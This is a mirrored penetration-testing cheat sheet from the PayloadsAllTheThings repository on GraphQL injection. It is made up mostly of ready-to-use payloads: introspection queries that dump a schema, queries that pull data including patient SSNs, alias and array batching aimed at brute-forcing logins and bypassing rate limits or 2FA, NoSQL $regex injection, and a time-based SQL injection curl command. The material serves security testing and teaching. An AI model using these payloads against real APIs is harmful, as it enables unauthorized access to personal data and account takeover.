mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-19 01:38:49 +00:00
401 lines
16 KiB
Markdown
401 lines
16 KiB
Markdown
# GraphQL Injection
|
||
|
||
> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
|
||
|
||
|
||
## Summary
|
||
|
||
- [GraphQL injection](#graphql-injection)
|
||
- [Summary](#summary)
|
||
- [Tools](#tools)
|
||
- [Enumeration](#enumeration)
|
||
- [Common GraphQL endpoints](#common-graphql-endpoints)
|
||
- [Identify an injection point](#identify-an-injection-point)
|
||
- [Enumerate Database Schema via Introspection](#enumerate-database-schema-via-introspection)
|
||
- [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions)
|
||
- [Enumerate the types' definition](#enumerate-the-types-definition)
|
||
- [List path to reach a type](#list-path-to-reach-a-type)
|
||
- [Exploit](#exploit)
|
||
- [Extract data](#extract-data)
|
||
- [Extract data using edges/nodes](#extract-data-using-edgesnodes)
|
||
- [Extract data using projections](#extract-data-using-projections)
|
||
- [Use mutations](#use-mutations)
|
||
- [GraphQL Batching Attacks](#graphql-batching-attacks)
|
||
- [JSON list based batching](#json-list-based-batching)
|
||
- [Query name based batching](#query-name-based-batching)
|
||
- [Injections](#injections)
|
||
- [NOSQL injection](#nosql-injection)
|
||
- [SQL injection](#sql-injection)
|
||
- [References](#references)
|
||
|
||
## Tools
|
||
|
||
* [swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) - Scripting engine to interact with a graphql endpoint for pentesting purposes
|
||
* [doyensec/graph-ql](https://github.com/doyensec/graph-ql/) - GraphQL Security Research Material
|
||
* [doyensec/inql](https://github.com/doyensec/inql) - A Burp Extension for GraphQL Security Testing
|
||
* [dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum) - Lists the different ways of reaching a given type in a GraphQL schema
|
||
* [andev-software/graphql-ide](https://github.com/andev-software/graphql-ide) - An extensive IDE for exploring GraphQL API's
|
||
* [mchoji/clairvoyancex](https://github.com/mchoji/clairvoyancex) - Obtain GraphQL API schema despite disabled introspection
|
||
* [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
|
||
* [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
|
||
* [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
|
||
* [IvanGoncharov/graphql-voyager)](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
|
||
* [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client
|
||
|
||
## Enumeration
|
||
|
||
### Common GraphQL endpoints
|
||
|
||
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
|
||
A more complete list is available at [danielmiessler/SecLists/graphql.txt](https://github.com/danielmiessler/SecLists/blob/fe2aa9e7b04b98d94432320d09b5987f39a17de8/Discovery/Web-Content/graphql.txt).
|
||
|
||
```ps1
|
||
/v1/explorer
|
||
/v1/graphiql
|
||
/graph
|
||
/graphql
|
||
/graphql/console/
|
||
/graphql.php
|
||
/graphiql
|
||
/graphiql.php
|
||
```
|
||
|
||
|
||
### Identify an injection point
|
||
|
||
```js
|
||
example.com/graphql?query={__schema{types{name}}}
|
||
example.com/graphiql?query={__schema{types{name}}}
|
||
```
|
||
|
||
Check if errors are visible.
|
||
|
||
```javascript
|
||
?query={__schema}
|
||
?query={}
|
||
?query={thisdefinitelydoesnotexist}
|
||
```
|
||
|
||
|
||
### Enumerate Database Schema via Introspection
|
||
|
||
URL encoded query to dump the database schema.
|
||
|
||
```js
|
||
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
|
||
```
|
||
|
||
URL decoded query to dump the database schema.
|
||
|
||
```javascript
|
||
fragment FullType on __Type {
|
||
kind
|
||
name
|
||
description
|
||
fields(includeDeprecated: true) {
|
||
name
|
||
description
|
||
args {
|
||
...InputValue
|
||
}
|
||
type {
|
||
...TypeRef
|
||
}
|
||
isDeprecated
|
||
deprecationReason
|
||
}
|
||
inputFields {
|
||
...InputValue
|
||
}
|
||
interfaces {
|
||
...TypeRef
|
||
}
|
||
enumValues(includeDeprecated: true) {
|
||
name
|
||
description
|
||
isDeprecated
|
||
deprecationReason
|
||
}
|
||
possibleTypes {
|
||
...TypeRef
|
||
}
|
||
}
|
||
fragment InputValue on __InputValue {
|
||
name
|
||
description
|
||
type {
|
||
...TypeRef
|
||
}
|
||
defaultValue
|
||
}
|
||
fragment TypeRef on __Type {
|
||
kind
|
||
name
|
||
ofType {
|
||
kind
|
||
name
|
||
ofType {
|
||
kind
|
||
name
|
||
ofType {
|
||
kind
|
||
name
|
||
ofType {
|
||
kind
|
||
name
|
||
ofType {
|
||
kind
|
||
name
|
||
ofType {
|
||
kind
|
||
name
|
||
ofType {
|
||
kind
|
||
name
|
||
}
|
||
}
|
||
}
|
||
}
|
||
}
|
||
}
|
||
}
|
||
}
|
||
|
||
query IntrospectionQuery {
|
||
__schema {
|
||
queryType {
|
||
name
|
||
}
|
||
mutationType {
|
||
name
|
||
}
|
||
types {
|
||
...FullType
|
||
}
|
||
directives {
|
||
name
|
||
description
|
||
locations
|
||
args {
|
||
...InputValue
|
||
}
|
||
}
|
||
}
|
||
}
|
||
```
|
||
|
||
Single line queries to dump the database schema without fragments.
|
||
|
||
```js
|
||
__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}
|
||
```
|
||
|
||
```js
|
||
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
|
||
```
|
||
|
||
|
||
### Enumerate Database Schema via Suggestions
|
||
|
||
When you use an unknown keyword, the GraphQL backend will respond with a suggestion related to its schema.
|
||
|
||
```json
|
||
{
|
||
"message": "Cannot query field \"one\" on type \"Query\". Did you mean \"node\"?",
|
||
}
|
||
```
|
||
|
||
|
||
### Enumerate the types' definition
|
||
|
||
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
|
||
|
||
```javascript
|
||
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
|
||
```
|
||
|
||
|
||
### List path to reach a type
|
||
|
||
```php
|
||
$ git clone https://gitlab.com/dee-see/graphql-path-enum
|
||
$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
|
||
Found 27 ways to reach the "Skill" node from the "Query" node:
|
||
- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||
- Query (query) -> Query (skills) -> Skill
|
||
```
|
||
|
||
|
||
## Exploit
|
||
|
||
### Extract data
|
||
|
||
```js
|
||
example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
|
||
```
|
||
|
||
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
|
||
|
||
|
||
|
||
### Extract data using edges/nodes
|
||
|
||
```json
|
||
{
|
||
"query": "query {
|
||
teams{
|
||
total_count,edges{
|
||
node{
|
||
id,_id,about,handle,state
|
||
}
|
||
}
|
||
}
|
||
}"
|
||
}
|
||
```
|
||
|
||
### Extract data using projections
|
||
|
||
:warning: Don’t forget to escape the " inside the **options**.
|
||
|
||
```json
|
||
{doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}}
|
||
```
|
||
|
||
|
||
### Use mutations
|
||
|
||
Mutations work like function, you can use them to interact with the GraphQL.
|
||
|
||
```javascript
|
||
# mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
|
||
# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
|
||
```
|
||
|
||
|
||
### GraphQL Batching Attacks
|
||
|
||
Common scenario:
|
||
* Password Brute-force Amplification Scenario
|
||
* Rate Limit bypass
|
||
* 2FA bypassing
|
||
|
||
|
||
#### JSON list based batching
|
||
|
||
> Query batching is a feature of GraphQL that allows multiple queries to be sent to the server in a single HTTP request. Instead of sending each query in a separate request, the client can send an array of queries in a single POST request to the GraphQL server. This reduces the number of HTTP requests and can improve the performance of the application.
|
||
|
||
Query batching works by defining an array of operations in the request body. Each operation can have its own query, variables, and operation name. The server processes each operation in the array and returns an array of responses, one for each query in the batch.
|
||
|
||
```json
|
||
[
|
||
{
|
||
"query":"..."
|
||
},{
|
||
"query":"..."
|
||
}
|
||
,{
|
||
"query":"..."
|
||
}
|
||
,{
|
||
"query":"..."
|
||
}
|
||
...
|
||
]
|
||
```
|
||
|
||
|
||
#### Query name based batching
|
||
|
||
```json
|
||
{
|
||
"query": "query { qname: Query { field1 } qname1: Query { field1 } }"
|
||
}
|
||
```
|
||
|
||
Send the same mutation several times using aliases
|
||
|
||
```js
|
||
mutation {
|
||
login(pass: 1111, username: "bob")
|
||
second: login(pass: 2222, username: "bob")
|
||
third: login(pass: 3333, username: "bob")
|
||
fourth: login(pass: 4444, username: "bob")
|
||
}
|
||
```
|
||
|
||
|
||
## Injections
|
||
|
||
> SQL and NoSQL Injections are still possible since GraphQL is just a layer between the client and the database.
|
||
|
||
|
||
### NOSQL injection
|
||
|
||
Use `$regex`, `$ne` from []() inside a `search` parameter.
|
||
|
||
```json
|
||
{
|
||
doctors(
|
||
options: "{\"limit\": 1, \"patients.ssn\" :1}",
|
||
search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
|
||
{
|
||
firstName lastName id patients{ssn}
|
||
}
|
||
}
|
||
```
|
||
|
||
|
||
### SQL injection
|
||
|
||
Send a single quote `'` inside a graphql parameter to trigger the SQL injection
|
||
|
||
```powershell
|
||
{
|
||
bacon(id: "1'") {
|
||
id,
|
||
type,
|
||
price
|
||
}
|
||
}
|
||
```
|
||
|
||
Simple SQL injection inside a graphql field.
|
||
|
||
```powershell
|
||
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
|
||
```
|
||
|
||
|
||
## References
|
||
|
||
* [Introduction to GraphQL](https://graphql.org/learn/)
|
||
* [GraphQL Introspection](https://graphql.org/learn/introspection/)
|
||
* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
|
||
* [GraphQL abuse: Bypass account level permissions through parameter smuggling - March 14, 2018 - @Detectify](https://labs.detectify.com/2018/03/14/graphql-abuse/)
|
||
* [Discovering GraphQL endpoints and SQLi vulnerabilities - Sep 23, 2018 - Matías Choren](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
|
||
* [Securing Your GraphQL API from Malicious Queries - Feb 21, 2018 - Max Stoiber](https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
|
||
* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
|
||
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066)
|
||
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
|
||
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
|
||
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
|
||
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
|
||
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
|
||
* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
|
||
* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)
|
||
* [GraphQL for Pentesters presentation by ACCEIS - 01/12/2022](https://acceis.github.io/prez-graphql/) - [source](https://github.com/Acceis/prez-graphql)
|
||
* [Exploiting GraphQL - Aug 29, 2021 - AssetNote - Shubham Shah](https://blog.assetnote.io/2021/08/29/exploiting-graphql/) |